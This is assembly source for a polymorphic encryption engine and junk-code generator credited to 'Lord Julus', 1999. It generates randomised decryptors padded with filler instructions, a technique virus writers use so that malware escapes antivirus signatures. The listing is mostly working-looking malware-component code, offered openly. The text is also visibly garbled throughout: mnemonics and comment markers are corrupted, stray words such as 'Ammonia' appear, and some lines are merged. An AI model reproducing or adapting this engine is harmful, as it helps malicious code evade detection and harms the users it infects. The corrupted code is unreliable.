Op1 = Operation over code with the key register (xor / add / sub); op2 = Operation over code with the static key (ror / rol)
Op3 = Operation over code with next code (xor / add / sub)
; OP4 = Operation over the key with the keyvalue (xor / add / sub)
Mainloop:
MOV EDX, DWORD PTR [EBX]; EDX = DWORD TO ENCRYPT
Push EAX EBX ECX;
MOV ECX, [EBP OP3]; ECX = OP3
MOV EAX, EDX; EAX, DWORD PTR [EBX 4]
MOV EBX, DWORD PTR [EBX 4];
Call makeop; do it!
Mov EDX, EAX;
POP ECX EBX EAX;
PUSH ECX;
MOV ECX, [EBP OP2]; ECX = OP2
CMP ECX, 0;
JNE NOTROR;
MOV ECX, [EBP Key2];
Ror EDX, Cl; Ror
JMP over1;
NOTROR:;
MOV ECX, [EBP Key2];
ROL EDX, CL; ROL
Over1:;
POP ECX;
Push EAX EBX ECX;
MOV ECX, [EBP OP1]; ECX = OP1
MOV EBX, EAX; We do EDX, EAX
MOV EAX, EDX;
Call makeop;
Mov EDX, EAX;
POP ECX EBX EAX;
;
MOV DWORD PTR [EBX], EDX;
;
Push EBX ECX;
CMP ECX, 1;
JE NO_THANKYOU;
MOV ECX, [EBP OP4]; ECX = OP4
MOV EBX, [EBP KeyValue]; We do Eax, KeyValue
Call makeop;
;
NO_THANKYOU:
POP ECX EBX;
;
SUB EBX, 4; We Go Back 1 DWORD
Loop mainloop; and loop
JMP OK; JUMP over
DB "Multiple Opcode Fantasies 32bit V.2.5 by Lord Julus - 1999"
Makeop:;
CMP ECX, 0; Is IT THE FIRST METHOD?
JNE NOTXOR;
XOR EAX, EBX; Yes, XOR!
JMP ready;
NOTXOR:;
CMP ECX, 1; or Maybe second?
JNE NOTD;
Add Eax, EBX; Yes, Add!
JMP ready;
NOTD:
Sub Eax, Ebx; Then, Sub!
Ready:;
Ret;
;
OK:;
POP ECX; Restore Code Length
POP EDI; Restore Decryptor Place
SHR ECX, 2; WE Work on DWORDS
MOV DWORD PTR [EBP Offset Key], EAX; Get Decryption Start Key
Add EBX, 4; Align Start of Code
EAX = Initial Key; ebx = initial offset
ECX = Real Length in dwords
Here We Start Taking, Filling and Writing The Decryptor
Lea ESI, [EBP Offset Decryptor]; ESI Points to the Decryptor
MOV [EBP Counter], 1; Counter for Instructions
;
Mov Eax, EDI; First We make some junk so what
Call makejunk; the jump to the decryptor is
Call makejunk; always at another offset
MOV EBX, EDI;
SUB EBX, EAX;
MOV [EBP first_INTEND], EBX;
Call makejunk; ... and some more ...
;
Getinstr:;
CMP [EBP Counter], 13D;
JE OVER_ALL;
LODSB; Load One Byte
CMP Al, 0FEH; Check for Instruction End
JE over_instr;
CMP Al, 0FFH; Check for Final End
JE OVER_ALL;
StoSb; store the byte
JMP Getinstr; Do It Again ...
;
Over_instr:;
Call makeinstr; Fill the Instruction
CMP [EBP Counter], 11D;
JE NO_JUNK_PLEASE;
Call makejunk; Create Junk After IT
;
NO_JUNK_PLEASE:;
INC [EBP Counter]; Increment Counter
JMP Getinstr; And do it again ...
;
Over_all:; the end ...
Call makejunk; ... Final Junk
Call makejunk;
MOV [EBP THE_END], EDI; MARK THE END
Call makejunk; Some More ...
Call makejunk;
MOV [EBP END_END], EDI; Real End!
Popad; Restore Registers
Ret; and return
; ?????????????????????????????????????????? ????????????????????????????
; Here We Have The Instruction Maker and The Junk Code Generator.?
; ?????????????????????????????????????????? ????????????????????????????
Makeinstr Proc Near; The Routine to Fill The Instr.
Pushad; save all regs
CMP [EBP Counter], 13D; Check for counter <13
JE OK_PROCS;
;
MOV EBX, DWORD PTR [EBP Counter]; Don't Tell Me That this is not
Dec Ebx; Optimized Because I Know, But
CMP EBX, 0; IT IS VERY DIFFICULT to DEAL
JE Proc01; with Relative Shit Relative
CMP EBX, 1; To DiffERENT ImageBases ...
JE Proc02; So get of my back ;-)
CMP EBX, 2;
JE PROC03;
CMP EBX, 3;
JE PROC04;
CMP EBX, 4;
JE PROC05;
CMP EBX, 5;
Je proc06;
CMP EBX, 6;
JE proc07;
CMP EBX, 7;
JE PROC08;
CMP EBX, 8;
JE PROC09;
CMP EBX, 9;
JE Proc10;
CMP EBX, 10;
JE proc11;
CMP EBX, 11;
JE proc12;
JMP OK_PROCS;
Here Are The Procedures To Fill Each Instruction of The Real Decryptor
PROC01:; MOV PREG, CODE_START
And Byte PTR [EDI-5], 1111000B; Clear THE PLACE for PREG
MOV Al, Byte PTR [EBP OFFSET PREG];
OR BYTE PTR [EDI-5], Al; Fill The PREG
MOV EAX, DWORD PTR [EBP Offset CodeAddr]
OR DWORD PTR [EDI-4], EAX; Fill the Code Start Value
JMP OK_PROCS;
;
Proc02:; Mov Kreg, Key
And Byte PTR [EDI-5], 1111000B; Clear THE PLACE for Kreg
Mov Al, Byte PTR [EBP OFFSET KREG];
OR BYTE PTR [EDI-5], Al; Fill the Kreg
MOV EAX, DWORD PTR [EBP OFFSET Key];
OR DWORD PTR [EDI-4], EAX; Fill The Key Value
JMP OK_PROCS;
;
PROC03:; MOV LREG, CODE_LENGTH / 8
And Byte Ptr [EDI-5], 1111000B; Clear the Place for LREG
MOV Al, Byte PTR [EBP Offset Lreg];
OR BYTE PTR [EDI-5], Al; Fill the Lreg
MOV EAX, DWORD PTR [EBP Offset Codelength]
OR DWORD PTR [EDI-4], EAX; Fill The Code Length Value
JMP OK_PROCS;
;
Proc04:; Mov CREG, [PREG] (MainLoop)
And Byte PTR [EDI-1], 11000000B; Clear for Pointer and Code Regs
MOV Al, Byte PTR [EBP OFFSET PREG];
;
CMP Al, 5; Take Care of [EBP] EXCEPTION
JNE NOT_EBP; (WHEN We use [ebp] addressing
MOV Al, 0; Mode, WE NEED A SUPLEMENTAL
Stosb; 00 Byte After the opcode
MOV Al, 5; and A 01000000B Fill Up - See
And Byte PTR [EDI-2], 0; (*))
OR BYTE PTR [EDI-2], Al; and Fill Them Up ...
MOV Al, Byte PTR [EBP OFFSET CREG];
SHL Al, 3; Align Like this: xxnnxxx
OR BYTE PTR [EDI-2], Al;
Or Byte Ptr [EDI-2], 01000000B; (*)
Mov increment_flag, 1;
MOV EAX, EDI;
SUB EAX, 3;
JMP DONE_I04;
;
;
Not_ebp:;
Or Byte Ptr [EDI-1], Al; and Fill Them Up ...
MOV Al, Byte PTR [EBP OFFSET CREG];
SHL Al, 3; Align Like this: xxnnxxx
Al byte PTR [EDI-1], Al;
MOV EAX, EDI;
SUB EAX, 2;
;
DONE_I04:;
MOV DWORD PTR [EBP OFFSET Mainlp], EAX;
JMP OK_PROCS;
;
PROC05:; CREG, KREG
And Byte PTR [EDI-1], 11000000B; Clear for r / m and reg
MOV Al, Byte PTR [EBP Offset Creg]; Get CREG,
SHL Al, 3; Align Like this xxnnxxx
Al byte PTR [EDI-1], Al;
Mov Al, Byte PTR [EBP OFFSET KREG];
Al byte PTR [EDI-1], Al;
And Byte PTR [EDI-2], 0;
MOV EAX, DWORD PTR [EBP OFFSET OP1];
Lea ESI, [EBP OFFSET UN_OP_CODE1];
Add ESI, EAX;
MOV Al, Byte PTR [ESI];
OR BYTE PTR [EDI-2], Al;
JMP OK_PROCS;
;
PROC06:; CREG, Key2
AND BYTE PTR [EDI-2], 1111000B;
MOV Al, Byte PTR [EBP Offset CREG]; Fill CREG
OR BYTE PTR [EDI-2], Al;
MOV Al, Byte PTR [EBP Offset Key2]; Fill Key
Al byte PTR [EDI-1], Al;
MOV EAX, DWORD PTR [EBP OFFSET OP2];
Lea ESI, [EBP OFFSET UN_OP_CODE3];
Add ESI, EAX;
MOV Al, Byte PTR [ESI];
AND BYTE PTR [EDI-2], 00000111B;
OR BYTE PTR [EDI-2], Al;
JMP OK_PROCS;
;
Proc07:; CREG, [PREG 4]
AND Byte PTR [EDI-2], 11000000B;
MOV Al, Byte PTR [EBP OFFSET PREG];
OR BYTE PTR [EDI-2], Al;
MOV Al, Byte PTR [EBP OFFSET CREG];
SHL Al, 3;
OR BYTE PTR [EDI-2], Al;
And Byte PTR [EDI-3], 0;
MOV EAX, DWORD PTR [EBP OFFSET OP3];
Lea ESI, [EBP OFFSET UN_OP_CODE1];
Add ESI, EAX;
MOV Al, Byte PTR [ESI];
Or Byte Ptr [EDI-3], Al;
JMP OK_PROCS;
;
Proc08:; MOV [PREG], CREG
And Byte PTR [EDI-1], 11000000B; Clear for Pointer and Code Regs
MOV Al, Byte PTR [EBP OFFSET PREG];
CMP Al, 5; Take Care of [EBP] EXCEPTION
JNE NOT_EBP2; (Check ProC04 for Explanation)
MOV Al, 0;
Stosb;
MOV Al, 5;
And Byte PTR [EDI-2], 0;
OR BYTE PTR [EDI-2], Al; and Fill Them Up ...
MOV Al, Byte PTR [EBP OFFSET CREG];
SHL Al, 3; Align Like this: xxnnxxx
OR BYTE PTR [EDI-2], Al;
Or Byte Ptr [EDI-2], 01000000B;
Mov increment_flag, 1;
JMP DONE_I08;
;
NOT_EBP2:;
Or Byte Ptr [EDI-1], Al; and Fill Them Up ...
MOV Al, Byte PTR [EBP OFFSET CREG];
SHL Al, 3; Align Like this: xxnnxxx
Al byte PTR [EDI-1], Al;
;
DONE_I08:;
JMP OK_PROCS;
;
Proc09:; Kreg, KeyValue
And Byte PTR [EDI-6], 0;
MOV EAX, DWORD PTR [EBP OFFSET OP4];
Lea ESI, [EBP OFFSET UN_OP_CODE2];
SHL EAX, 1;
Add ESI, EAX;
MOV AX, Word PTR [ESI];
And Word PTR [EDI-6], 0;
Or Word PTR [EDI-6], AX;
And Byte PTR [EDI-5], 1111000B;
MOV Al, Byte PTR [EBP Offset Kreg]; Fill KREG
Or Byte Ptr [EDI-5], Al;
MOV EAX, DWORD PTR [EBP Offset KeyValue]; Fill Key
And DWORD PTR [EDI-4], 0;
OR DWORD PTR [EDI-4], EAX;
JMP OK_PROCS;
;
Proc10:; SUB PREG, 4
AND BYTE PTR [EDI-2], 1111000B;
MOV Al, Byte PTR [EBP OFFSET PREG];
OR BYTE PTR [EDI-2], Al;
JMP OK_PROCS;
;
Proc11:; SUB LREG, 1
AND BYTE PTR [EDI-2], 1111000B;
MOV Al, Byte PTR [EBP Offset Lreg];
OR BYTE PTR [EDI-2], Al;
JMP OK_PROCS;
;
Proc12:; jnz mainloop
MOV EAX, DWORD PTR [EBP OFFSET Mainlp];
MOV EDX, EDI;
Add EDX, 4;
Sub Eax, EDX; and DWORD PTR [EDI], 0;
OR DWORD PTR [EDI], EAX;
POPAD;
Add EDI, 4;
JMP Special_ok_procs;
;
Ok_procs:; done!
Popad; Restore All Regs
;
Special_ok_procs:;
CMP [EBP Increment_flag], 1; IF We Stored SUPLEMENTAL BYTES
JNE NO_INCREMENT; WE NEED TO MOVE EDI Forward.
Inc EDI;
MOV [EBP Increment_flag], 0;
;
NO_INCREMENT:;
Ret; and return
Makeinstr ENDP;
;
; ?????????????????????????????????????????? ???????????????????????????
;? Beiananan Anananan Anananan Anananan Anananan Anananan Anananan Anananan saddle Anananan
;?
;? Lord Julus' JUNK Generator Module V.1.0 (March 1999)?
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
;?
Ammonia?
; Anananan Anananan Anananan Anananan Anananan Anananan Anananan Anananan Anananan ammonia?
Makejunk Proc Near; this is the main junk
Push EAX EBX ECX EDX ESI;
Mov ECX, Maxjunks; Routine.
Junk_loop:;
Call_makejunk;
LOOP JUNK_LOOP;
POP ESI EDX ECX EBX EAX;
Ret;
Makejunk Endp;
DB "JGM - Junk Generator Module V.1.0 by Lord Julus - March 1999"
;
_Makejunk Proc Near; Generate Junk!
Push Eax;
Mov Eax, 5; Choose Between Safe Junks
Call Brandom32; and Junks That Might
CMP Eax, 3; Generate Exception Errors
JAE flawable_junk;
;
Call make_sure_junk;
JMP EXIT_JUNK;
;
FLAWABLE_JUNK:
Call make_flaw_junk;
;
EXIT_JUNK:;
POP EAX;
Ret; and return
_makejunk endp;
;
Make_flaw_junk proc Near; Here We Will Generate
Push EBX ECX EDX; JUNKS THAT COULD RAISE
Mov Eax, Max_Junk_hunk; Exception Errors ...
Call Brandom32;
Inc EAX;
;
MOV [EBP FLAWABLE], 0; (Mark the Type)
;
MOV ECX, EAX;
;
Mov al, 0e9h; ... And so weerate a
Stosb; Jump to Skip Them
MOV [EBP Address_save], EDI; Save Jump Place
MOV EAX, 0;
Stosd;
;
REPEAT_MAKEJUNK:;
Call Output_one_junk; now we make the junks
Loop repeat_makejunk ;;
Push EDI;
Sub EDI, [EBP Address_save]; and create the jump
MOV EAX, EDI; Address
SUB EAX, 4;
MOV EDI, [EBP Address_SAVE];
Stosd;
POP EDI;
;
POP EDX ECX EBX EAX;
Ret;
Make_flaw_junk endp;
;
Make_sure_junk proc NEAR;
Push EBX ECX EDX; JUNKS THAT COULD RAISE
Mov Eax, Max_Junk_hunk; Exception Errors ...
Call Brandom32;
Inc EAX;
;
MOV [EBP FLAWABLE], 1; (MARK TYPE)
;
MOV ECX, EAX;
;
REPEAT_MAKEJUNK_2:
Call Output_one_junk; now we make the junks
LOOP REPEAT_MAKEJUNK_2;
;
POP EDX ECX EBX EAX;
Ret;
Make_sure_junk endp;
;
Output_one_junk proc; this procedure outputs
Push Ecx; One Junk Instruction
;
Call choose_random_disp; first choose Displacements
;
Choose_another:;
MOV Eax, Table_Numbers; Choose One Instruction
Call Brandom32; Table
;
CMP [EBP WE_CREATE_JCOND], 1; Prevent Reentry
JNE NO_CASE; WHEN CREANG CONDitional
CMP EAX, 3; Jumps
JE choose_another;
CMP EAX, 5;
JE choose_another;
;
NO_CASE:;
CMP [EBP FLAWABLE], 1; if the instruction mustn't
JNE GO_ON_UNSTOPPED; Generate Exception ErrorS
CMP Eax, 0; We cannot USE TABLE 1!
JE choose_another;
;
GO_ON_UNSTOPPED:;
Lea EBX, DWORD PTR [EBP JUNK_TABLE_PROCS]; Take Out the Procedure
SHL EAX, 2;
Add EBX, EAX;
MOV EAX, DWORD PTR [EBX];
Add Eax, EBP;
JMP EAX; and jump to it ...
;
Junk_proc1:; Here We Use Table1
MOV EAX, 2;
Call Brandom32;
MOV EBX, EAX; Save Possible Increment
Add Ebx, 2; 2 or 3 ...
;
MOV EAX, Table1_len; Take a Random Operation
Call Brandom32; from the table1
SHL EAX, 1;
LEA ESI, DWORD PTR [EBP TABLE1];
Add ESI, EAX;
Lodsb;
Add Eax, EBX; Toggle Size
Stosb;
;
Lea ESI, DWORD PTR [EBP MODRM]; Take A ModRM Bytecall Choose_Jreg; Choose the Random Jreg
Mov EDX, EAX;
Mov Eax, 32; And A Random Addressing
Call Brandom32; Type
MOV DWORD PTR [EBP ROW], EAX; Save the Row
SHL EAX, 3;
Add ESI, EAX;
Add ESI, EDX;
Lodsb;
Stosb; Store ModRM
;
Mov Eax, 2; Choose Addressing Type
Call Brandom32;
;
CMP EAX, 1; Is IT 32bit Addressing?
JE _32BIT_ADDRESSING;
;
MOV AX, Word PTR [EDI-2]; if it's 16bit kiln
SHL EAX, 10; Must Go Behind the opcode
Dec EDI;
Dec EDI;
MOV Al, Address_Size_Toggle; and Put An Address Size
Stosb; Toggle prefix there
SHR EAX, 10;
Stosw;
;
_16BIT_ADDRESSING:
MOV EDX, DWORD PTR [EBP ROW]; Restore Row In EDX
CMP EDX, 6; DISP16 NEEDED?
JNE NOT_EXC_1;
MOV AX, Word PTR [EBP DISP16];
Stosw;
;
JMP Finish_Processing_1;
;
NOT_EXC_1:;
CMP EDX, 7; NEED TO Add A DISP8?
JBE NOT_EXC_2;
CMP EDX, 16;
JAE not_exc_2;
MOV Al, Byte PTR [EBP DISP8];
Stosb;
;
JMP Finish_Processing_1;
;
NOT_EXC_2:;
CMP EDX, 15; NEED TO Add A DISP16?
JBE NOT_EXC_3;
CMP EDX, 24;
JAE NOT_EXC_3;
MOV AX, Word PTR [EBP DISP16];
Stosw;
;
JMP Finish_Processing_1;
;
NOT_EXC_3:;
JMP Finish_Processing_1;
;
_32BIT_ADDRESSING:
MOV EDX, DWORD PTR [EBP ROW]; Restore Row In EDX
CMP EDX, 5;
JNE NOT_EXC_4;
MOV EAX, DWORD PTR [EBP DISP32];
Stosd;
JMP Finish_Processing_1;
;
NOT_EXC_4:;
CMP EDX, 4;
JE NEED_SIB;
CMP EDX, 12;
JE NEED_SIB;
CMP EDX, 20;
JE NEED_SIB;
;
CMP EDX, 7; NEED TO Add A DISP8?
JBE NOT_EXC_5;
CMP EDX, 16;
JAE NOT_EXC_5;
MOV Al, Byte PTR [EBP DISP8];
Stosb;
JMP Finish_Processing_1;
;
NOT_EXC_5:;
CMP EDX, 15; NEED TO Add A DISP32? JBE NOT_EXC_6;
CMP EDX, 24;
JAE not_exc_6;
MOV EAX, DWORD PTR [EBP DISP32];
Stosd;
JMP Finish_Processing_1;
;
NOT_EXC_6:;
JMP Finish_Processing_1;
;
NEED_SIB:; IF WE NEED A SIB BYTE
Lea ESI, DWORD PTR [EBP MODRM]; We Compute IT Rite Here ...
MOV EAX, 8;
Call Brandom32;
MOV EBX, EAX;
MOV EAX, 32;
Call Brandom32;
CMP EAX, 4;
JE NEED_SIB;
CMP EAX, 12;
JE NEED_SIB;
CMP EAX, 20;
JE NEED_SIB;
SHL EAX, 3;
Add ESI, EAX;
Add ESI, EBX;
Lodsb;
Stosb;
CMP EDX, 12;
JNE MAYBE_32;
MOV Al, Byte PTR [EBP DISP8];
Stosb;
JMP Finish_Processing_1;
;
Maybe_32:;
CMP EDX, 20;
JNE FINISH_PROCESSING_1;
MOV EAX, DWORD PTR [EBP DISP32];
Stosd;
JMP Finish_Processing_1;
;
FINISH_PROCESSING_1:;
JMP over_ONE_JUNK;
;
Junk_proc2:; Here We Use Table 2
MOV EAX, 2;
Call Brandom32;
MOV EBX, EAX;
MOV EBX, 1; Force 16 / 32bit
MOV EAX, Table2_len; Take a Random Operation
Call Brandom32; from the table2
SHL EAX, 1;
LEA ESI, DWORD PTR [EBP TABLE2];
Add ESI, EAX;
Lodsb;
Add Eax, EBX; Toggle Size
Stosb;
;
XOR EAX, EAX;
Call choose_jreg;
MOV EBX, EAX;
SHL BX, 3;
Call choose_jreg;
OR BL, Al;
MOV Al, BL;
OR Al, 11000000B; Make Reg To REG
Stosb;
;
JMP over_ONE_JUNK;
;
JUNK_PROC3:;
MOV EAX, Table3_Len-2; Take a Random Operation
Call Brandom32; from the table3
SHL EAX, 1;
LEA ESI, DWORD PTR [EBP TABLE3];
Add ESI, EAX;
Lodsb;
XCHG EAX, EBX;
Call choose_jreg;
Add EBX, EAX;
XCHG EAX, EBX;
Stosb;
;
JMP over_ONE_JUNK;
;
Junk_proc4:; Here We Create Short
MOV [EBP WE_CREATE_JCOND], 1; Conditional Jumps
LEA ESI, DWORD PTR [EBP TABLE4];
Lodsb;
XCHG EAX, EBX; MOV EAX, 0EH;
Call Brandom32;
Add EBX, EAX;
XCHG EAX, EBX;
Stosb;
XOR Al, Al;
Stosb;
;
Push Word PTR [EBP FLAWABLE];
;
MOV [EBP FLAWABLE], 1;
;
Push EDI;
Call output_one_junk; Output One Junk After
POP EBX; THE CONDitional Jump
PUSH EBX;
XCHG EDI, EBX;
SUB EBX, EDI;
Add Edi, EBX;
POP ESI;
Dec ESI;
MOV BYTE PTR [ESI], BL;
;
MOV [EBP WE_CREATE_JCOND], 0;
;
POP Word PTR [EBP FLAWABLE];
;
JMP over_ONE_JUNK;
;
JUNK_PROC5:;
Call choose_jreg; Make Imm to REG
Mov EBX, EAX; Choose the Register
Mov Eax, Table5_len; Take a Random Operation
Call Brandom32; from the table1
MOV Eax, 1; Force 16/32 Bit
Mov ECX, EAX; Save Type
SHL EAX, 1;
LEA ESI, DWORD PTR [EBP TABLE5];
Add ESI, EAX;
Lodsb;
Add Eax, EBX;
;
Stosb; Store Opcode
;
Don't unmark these !!! I Need some more confeditions to make 8 bit MOV
; CMP ECX, 1;
JE MOV_1632BIT; 16 or 32 bit?
;;
; MOV_8bit:;
; MOV Al, Byte PTR [EBP DISP8]; 8 BIT IMM
Stosb;
JMP quit_mov;
;
MOV_1632bit:;
Mov Eax, 2; Choose Between 16 and
Call Brandom32; 32 Bit
CMP EAX, 0;
JE DO_16;
MOV EAX, DWORD PTR [EBP DISP32]; 32 BIT IMM
Stosd;
JMP quit_mov;
;
DO_16:;
Dec EDI; 16 BIT IMM
Mov Al, Byte PTR [EDI]; We need to override
MOV BYTE PTR [EDI 1], Al; The Operand Size
MOV BYTE PTR [EDI], 66H;
Add EDI, 2;
MOV AX, Word PTR [EBP DISP16];
Stosw;
;
Quit_mov:; DONE!
JMP over_ONE_JUNK;
;
JUNK_PROC6:;
MOV [EBP WE_CREATE_JCOND], 1;
MOV Al, 0FH;
Stosb;
LEA ESI, DWORD PTR [EBP TABLE6];
Lodsb;
XCHG EAX, EBX;
Mov Eax, 0EH;
Call Brandom32;
Add EBX, EAX;
XCHG EAX, EBX;
Stosb;
XOR EAX, EAX;
Stosd;
;
Push Word PTR [EBP FLAWABLE] ;;
MOV [EBP FLAWABLE], 1;
;
Push EDI;
Call output_one_junk;
POP EBX;
PUSH EBX;
XCHG EDI, EBX;
SUB EBX, EDI;
Add Edi, EBX;
POP ESI;
SUB ESI, 4;
MOV DWORD PTR [ESI], EBX;
;
MOV [EBP WE_CREATE_JCOND], 0;
;
POP Word PTR [EBP FLAWABLE];
;
JMP over_ONE_JUNK;
;
JUNK_PROC7:;
Mov Eax, Table7_len; Take a Random Operation
Call Brandom32; from the table1
SHL EAX, 1;
LEA ESI, DWORD PTR [EBP TABLE7];
Add ESI, EAX;
Lodsb;
Stosb;
;
JMP over_ONE_JUNK;
;
Over_one_junk:;
;
POP ECX;
Ret;
Output_one_junk endp;
;
Junk_table_procs label; Junk Procs Addresses
DD OFFSET JUNK_PROC1;
DD OFFSET JUNK_PROC2;
DD OFFSET JUNK_PROC3;
DD OFFSET JUNK_PROC4;
DD OFFSET JUNK_PROC5;
DD Offset JUNK_PROC6;
DD Offset Junk_Proc7;
;
Choose_jreg proc near; choose One Random Junk
Mov Eax, 3; Register Out of the 3
Call Brandom32; Available
CMP EAX, 0;
JNE NOT_0;
XOR EAX, EAX;
MOV Al, [EBP JREG1];
Ret;
NOT_0:;
CMP EAX, 1;
JNE NOT_1;
XOR EAX, EAX;
MOV Al, [EBP JREG2];
Ret;
NOT_1:;
XOR EAX, EAX;
MOV Al, [EBP JREG3];
Ret;
Choose_jreg Endp;
;
Choose_random_disp proc Near; Choose Random Displacements
Push Eax;
Call random32;
MOV DWORD PTR [EBP DISP32], EAX; 32bit
Call random32;
MOV Word PTR [EBP DISP16], AX; 16bit
Call random32;
MOV BYTE PTR [EBP DISP8], AL; 8bit
POP EAX;
Ret;
Choose_random_disp endp;
;
Maxjunks = 5;
Max_junk_hunk = 3;
ROW DD 0;
ModRM Label
The Intel (C) Instruction Set Comes in The Following Mode:
;
Prefixes, Opcode, Mod / RM, SIB, Immediate
;
The Mod / RM and SIB BYTES Are Defined in The Following Table:
;
; ?????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
; ?????????????????????????????????????????? ?????????????????????????????????????;? Al CL DL BL AH CH DH BH? 8bit register?
;? AX CX DX BX SP BP Si Di? 16bit Register?
• EAX ECX EDX EBX ESP EBP ESI EDI? 32bit Register?
;? 0 1 2 3 4 5 6 7? Order?
; 000 001 010 011 100 101 110 111 ?????????????????????????; mode / RM Value: (MOD = 00)? 16bit addr? 32bit ad.?scale?
; ?????????????????????????????????????????? ???????????????????????????
DB 000H, 008H, 010H, 018H, 020H, 028H, 030H, 038H;? [BX Si]? [eax]? [EAX]?
DB 001H, 009H, 011H, 019H, 021H, 029H, 031H, 039H;? [BX DI]? [ECX]? [ECX]?
DB 002H, 00ah, 012h, 01ah, 022h, 02ah, 032h, 03ah;? [bp si]? [EDX]? [EDX]?
DB 003H, 00BH, 013H, 01BH, 023H, 02BH, 033H, 03BH;? [BP DI]? [EBX]? [ECX]?
DB 004H, 00CH, 014H, 01CH, 024H, 02CH, 034H, 03CH;? [Si]? [-]? NONE?
DB 005H, 00DH, 015H, 01DH, 025H, 02DH, 035H, 03DH;? [DI]? D32? [EBP]?
DB 006H, 00Eh, 016h, 01eh, 026h, 02eh, 036h, 03Eh;? D16? [ESI]? [ESI]?
DB 007H, 00FH, 017H, 01FH, 027H, 02FH, 037H, 03FH;? [bx]? [eDI]? [EDI]?
Mod / RM Value: (MOD = 01)????
DB 040H, 048H, 050H, 058H, 060H, 068H, 070H, 078H;? [BX Si D8]? [EAX D8]? [eax * 2]?
DB 041H, 049H, 051H, 059H, 061H, 069H, 071H, 079H;? [BX DI D8]? [ECX D8]? [ECX * 2]?
DB 042H, 04AH, 052H, 05AH, 062H, 06AH, 072H, 07AH;? [BP SI D8]? [EDX D8]? [EDX * 2]?
DB 043H, 04BH, 053H, 05BH, 063H, 06BH, 073H, 07BH;? [BP DI D8]? [EBX D8]? [EBX * 2]?
DB 044H, 04CH, 054H, 05CH, 064H, 06CH, 074H, 07CH;? [Si D8]? [- D8]? none?
DB 045H, 04DH, 055H, 05DH, 065H, 06DH, 075H, 07DH;? [DI D8]? [EBP D8]? [EBP * 2]?
DB 046H, 04EH, 056H, 05EH, 066H, 06EH, 076H, 07EH;? [BP D8]? [ESI D8]? [ESI * 2]? DB 047H, 04FH, 057H, 05FH, 067H, 06FH, 077h 07fh;? [Bx d8]? [EDI D8]? [EDI * 2]?
Mod / RM Value (mod = 10)????
DB 080H, 088H, 090H, 098H, 0A0H, 0A8H, 0B0H, 0B8H;? [BX Si D16]? [EAX D32]? [EAX * 4]?
DB 081H, 089H, 091H, 099H, 0A1H, 0A9H, 0B1H, 0B9H;? [BX DI D16]? [ECX D32]? [ECX * 4]?
DB 082H, 08AH, 092H, 09AH, 0A2H, 0AAH, 0B2H, 0BAH;? [BP SI D16]? [EDX D32]? [EDX * 4]?
DB 083H, 08BH, 093H, 09BH, 0A3H, 0ABH, 0B3H, 0BBH;? [BP DI D16]? [EBX D32]? [EBX * 4]?
DB 084H, 08CH, 094H, 09CH, 0A4H, 0ACH, 0B4H, 0BCH;? [Si D16]? [- D32]? NONE?
DB 085H, 08DH, 095H, 09DH, 0A5H, 0ADH, 0B5H, 0BDH;? [DI D16]? [EBP D32]? [EBP * 4]?
DB 086H, 08EH, 096H, 09EH, 0A6H, 0AEH, 0B6H, 0BEH;? [BP D16]? [ESI D32]? [ESI * 4]?
DB 087H, 08FH, 097H, 09FH, 0A7H, 0AFH, 0B7H, 0BFH;? [BX D16]? [EDI D32]? [EDI * 4]?
Mod / rm value (mod = 11)????
DB 0C0H, 0C8H, 0D0H, 0D8H, 0E0H, 0E8H, 0F0H, 0F8H;? EAX / AX / AL? EAX / AX / AL? [EAX * 8]?
DB 0C1H, 0C9H, 0D1H, 0D9H, 0E1H, 0E9H, 0F1H, 0F9H;? ECX / CX / CL? ECX / CX / CL? [ECX * 8]?
DB 0C2H, 0CAH, 0D2H, 0DAH, 0E2H, 0EAH, 0F2H, 0FAH;? EDX / DX / DL? EDX / DX / DL? [EDX * 8]?
DB 0C3H, 0CBH, 0D3H, 0DBH, 0E3H, 0EBH, 0F3H, 0FBH;? EBX / BX / BL? EBX / BX / BL? [EBX * 8]?
DB 0C4H, 0CCH, 0D4H, 0DCH, 0E4H, 0ECH, 0F4H, 0FCH;? ESP / SP / AH? ESP / SP / AH? NONE?
DB 0C5H, 0CDH, 0D5H, 0DDH, 0E5H, 0EDH, 0F5H, 0FDH;? EBP / BP / CH? EBP / BP / CH? [EBP * 8]?
DB 0C6H, 0CEH, 0D6H, 0DEH, 0E6H, 0EEH, 0F6H, 0FEH; ESI / SI / DH? ESI / SI / DH? [ESI * 8]?
DB 0C7H, 0CFH, 0D7H, 0DFH, 0E7H, 0EFH, 0F7H, 0FFH;? EDI / DI / BH? EDI / DI / BH? [EDI * 8]?
; ?????????????????????????????????????????? ??????????????????????????
The prefixes:
OPERAND_SIZE_TOGGLE DB 66H; Changes BetWeen 16bit and 32bit Operands
Address_SIZE_TOGGLE DB 67H; Changes Between 16bit and 32bit addressing; The Toggle Bytes (Applied by Xoring The Opcode with the):
Direction_Toggle DB 02H; Toggles Operand-> Address and address-> OP.
SIZE_TOGGLE DB 01H; Toggles Between 8bit and 16bit Operators
The immediate value used:
DISP8 DB 0; 8bit Displacement
DISP16 DW 0; 16bit Displacement
DISP32 DD 0; 32bit Displacement
Reg To / from address: (Second Byte 0 = ONLY JUNK Register / 1 = Any Register)
Table1 label
DB 000H, 0; add explanation:
DB 008H, 0; or - unchaged = 8bit Addr -> 8bit REG
DB 010H, 0; ADC - 1 = 16bit Addr -> 16bit REG
DB 018H, 0; SBB - 2 = 8bit REG -> 8bit Addr
DB 020H, 0; and - 3 = 16bit reg -> 16bit Addr
DB 028H, 0; SUB
DB 030H, 0; xor
DB 038H, 1; CMP
DB 088H, 0; MOV
Table1_len = ($ -offset Table1) / 2
Table2 label
DB 084H, 1; Test - Unchanged = 8bit -> 8bit
DB 086H, 0; XCHG 1 = 16bit -> 16bit
Table2_len = ($ -offset Table2) / 2
Table3 label
DB 040H, 0; INC reg Number = increg
DB 048H, 0; DEC reg Number = DEC REG
DB 050H, 0; Push Reg Number = Push REG
DB 058H, 0; POP REG Number = POP REG
TABLE3_LEN = ($ -offset Table3) / 2
Table4 label
DB 070H, 0; Conditonal Jump 0 .. 0FH = Jump Condition
Table4_len = ($ -offset Table4) / 2
Table5 label
DB 0B0H, 0; MOV IMMEDIATE TO 8bit Reg Reg Number = MOV To REG
DB 0B8H, 0; MOV IMMEDIATE TO 16 / 32bit Reg Reg Number = MOV To REG
TABLE5_LEN = ($ -offset Table5) / 2
Table6 label
DB 080H, 0; Long Conditional JMP
Table6_len = ($ -offset Table6) / 2
Table7 label
CLC
DB 0
STC
